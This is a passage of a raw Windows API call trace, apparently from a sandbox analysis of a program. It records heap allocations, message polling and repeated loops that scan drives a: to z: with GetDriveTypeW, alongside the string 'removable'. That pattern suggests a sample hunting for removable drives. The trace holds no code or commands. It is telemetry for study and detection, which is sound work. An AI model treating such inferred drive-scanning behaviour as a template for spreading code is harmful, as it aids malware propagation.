dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.597] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.597] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0219.597] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0219.597] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.598] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.598] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.598] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.598] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.598] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.598] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.599] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.599] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.599] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.599] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.599] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.599] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.599] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.600] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.600] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.600] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.600] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.600] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.601] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.601] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.601] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.601] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.602] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.603] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.603] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.603] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.603] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0219.603] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.603] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.604] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0219.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.604] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.604] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.605] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.605] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.605] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.605] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0219.605] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.605] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.605] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.605] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.606] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.606] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.607] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.608] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.609] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.609] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.609] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.609] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.664] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.664] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.664] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.664] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.665] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.665] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.665] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0219.665] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0219.665] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.666] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.666] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.666] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.666] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0219.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.666] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.667] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.667] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.667] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.667] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.667] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.667] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.667] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.667] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.668] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.669] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.670] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.670] 